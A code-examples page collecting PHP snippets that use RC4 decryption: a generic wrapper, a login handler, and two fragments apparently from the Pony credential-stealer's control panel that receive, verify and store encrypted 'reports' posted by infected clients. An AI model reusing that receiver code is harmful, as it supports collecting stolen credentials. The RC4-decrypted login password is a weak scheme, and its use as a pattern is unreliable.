public static function pre_decrypt_report(&$data, $report_password = '')
 {
     if (substr($data, 0, strlen(REPORT_CRYPTED_HEADER)) != REPORT_CRYPTED_HEADER) {
         return false;
     }
     if (strlen($data) == 0) {
         return false;
     } else {
         if (strlen($data) < 12) {
             return false;
         } else {
             if (strlen($data) > REPORT_LEN_LIMIT) {
                 return false;
             } elseif (strlen($data) == 12) {
                 // empty report
                 return false;
             }
         }
     }
     // extract crc32 checksum from datastream
     $crc_chk = data_int32(substr($data, strlen($data) - 4));
     // remove crc32 checksum from the encrypted data stream
     $encrypted_data = substr($data, 0, -4);
     // check report validness
     $crc_chk = obf_crc32($crc_chk);
     if ((int) crc32($encrypted_data) != (int) $crc_chk) {
         return false;
     }
     $decrypted_data = rc4Decrypt($report_password, substr($encrypted_data, 8));
     // there's another crc32 checksum available to verify the decryption process
     // extract crc32 checksum from decrypted datastream
     $crc_chk = data_int32(substr($decrypted_data, strlen($decrypted_data) - 4));
     // remove crc32 checksum from the data stream
     $decrypted_data_check = substr($decrypted_data, 0, -4);
     // check report validness
     $crc_chk = obf_crc32($crc_chk);
     if ((int) crc32($decrypted_data_check) != (int) $crc_chk) {
         return false;
     }
     $data = $decrypted_data;
     return true;
 }
Example #2
0
 /**
  * Decrypt given cipher text using the key with RC4 algorithm.
  * All parameters and return value are in binary format.
  *
  * @param string $key secret key for decryption
  * @param string $ct  cipher text to be decrypted
  *
  * @return string
  */
 public static function decrypt($key, $ct)
 {
     return \rc4Decrypt($key, $ct);
 }
Example #3
0
 /**
  * Login with post'ed username and encrypted password.
  *
  * @return void
  * @access public
  */
 public function login()
 {
     global $configArray;
     unset($_SESSION['no_store']);
     // Fetch Salt
     $salt = $this->_generateSalt();
     // HexDecode Password
     $password = pack('H*', $_POST['ajax_password']);
     // Decrypt Password
     include_once 'Crypt/rc4.php';
     // Looks like we need utf8_encode to handle the password properly
     $password = utf8_encode(rc4Decrypt($salt, $password));
     // Put the username/password in POST fields where the authentication module
     // expects to find them:
     $_POST['username'] = $_POST['ajax_username'];
     $_POST['password'] = $password;
     $_POST['login_target'] = $_POST['ajax_loginTarget'];
     // Authenticate the user:
     $user = UserAccount::login();
     if (PEAR::isError($user)) {
         $msgType = $user->getMessage();
         $msg = translate($msgType);
         if ($user->getCode() == ILSAuthentication::ERROR_CONFIRM_CREATE_ACCOUNT) {
             return $this->output(array('msg' => $msg, 'type' => $msgType, 'accounts' => $user->getUserInfo()), JSON::STATUS_ERROR);
         } else {
             return $this->output($msg, JSON::STATUS_ERROR);
         }
     }
     return $this->output(true, JSON::STATUS_OK);
 }
Example #4
0
    $enable_http_mode = false;
}
if (!isset($enable_email_mode)) {
    $enable_email_mode = false;
}
// client IP
$ip = get_client_ip();
// get report data
$real_length = intval($_SERVER['CONTENT_LENGTH']);
$received_report_data = file_get_contents('php://input');
// check if data was received in full
if ($real_length !== strlen($received_report_data) || $real_length <= 4) {
    die;
}
// check and decrypt first RC4 layer
$received_report_data = rc4Decrypt(substr($received_report_data, 0, 4), substr($received_report_data, 4));
$report_id = 0;
// report data length should be inbetween 12 bytes and 900 Kb (default mysql query max. length)
$max_db_len_size = 1024 * 900;
if (strlen($received_report_data) > 12 && strlen($received_report_data) <= $max_db_len_size) {
    if (report_parser::verify_report_file_header($received_report_data)) {
        $report_status_ok = false;
        $ip_country = geo_ip_country_code($ip);
        if (report_parser::check_report_crypted_header($received_report_data)) {
            // try to pre-decrypt report data
            report_parser::pre_decrypt_report($received_report_data, $pony_db_report_password);
        }
        // add non parsed report
        $report_id = $pony_db->add_nonparsed_report($ip, $ip_country, $received_report_data);
        if ($report_id) {
            // there's new report available for parsing